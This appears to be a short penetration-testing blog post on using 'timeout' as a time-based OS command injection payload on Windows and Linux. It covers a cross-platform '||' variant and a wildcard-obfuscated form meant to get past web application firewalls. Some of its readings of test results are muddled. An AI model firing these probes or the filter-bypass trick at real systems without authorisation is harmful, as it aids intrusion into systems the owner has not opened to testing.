Diversify Attack Vectors via Time Management

I've recently learned about the "Timeout" function while working with cmd.exe and wanted to share this quick post with you.

I discovered that the Timeout function can delay any system function for X seconds with the "/T X" command when I looked at the Timeout help pages via the "Timeout /?" command in Windows OS. For Linux, it does something similar with "Timeout Xs".

We could delay the system via the Timeout function. Then, I got an idea! Maybe I could create an alternative to attack vectors such as Ping or Sleep in this way. It seems like we can do this in very different ways. When we run the command, we might get some syntax errors, but I assume that some of the code will work. Now let's try to use this information to develop attack vectors.

Windows examples are as follows:

Timeout /T 1
waiting for 1 sec

Timeout 1
waiting for 1 sec

Linux examples are as follows:

timeout 1
I got the error “Try 'timeout --help' for more information.”

timeout 1s sleep 5
waiting for 1 sec. The “Sleep” command is not working.

timeout 1 sleep 5
waiting for 1 sec. The “Sleep” command is not working.

timeout 3 ping -n 127.0.0.1
The ping command worked 3 times.

timeout 0 ping -n 3 127.0.0.1
I got the error.“connect : Invalid argument”

For both Linux and Windows, we have created some payloads above. Now let's try to create an attack vector that will work in both operating systems. To accomplish this, we divide the command into two using the "||" double pipe property.

Windows examples are as follows:

timeout 5 || timeout 1 sleep 5
The command worked on the left of the double pipe

timeout /T 5 || timeout 1 sleep 5
The command worked on the left of the double pipe

Linux examples are as follows:

timeout 5 || timeout 1 sleep 5
The command didn’t work on the left. I got the error “Try 'timeout --help' for more information.” but waited for 1 second on the right.

timeout 5 || timeout 0 sleep 5
The command didn’t work on the left. I got the error “Try 'timeout --help' for more information.” but waited for 5 seconds on the right using the sleep command

As we have seen in this section, we have developed a few examples that worked in both operating systems, and then I created an issue in the Commix repository for these attack vectors (Commix - Github Issues). Maybe, the Timeout function can be used for WAF bypass detection in the OOB (Out Of Band) payload, which is time-based detection in the vulnerability detection phase.

For example:

We could create other variants via this code below for WAF Bypass while testing OS Command Injection. Also, the “?” symbol triggers the bash guess mechanism.

timeout 3 /b??/p??g -n 127.0.0.1

Have fun!

Special thanks to Zinnur Yeşilyurt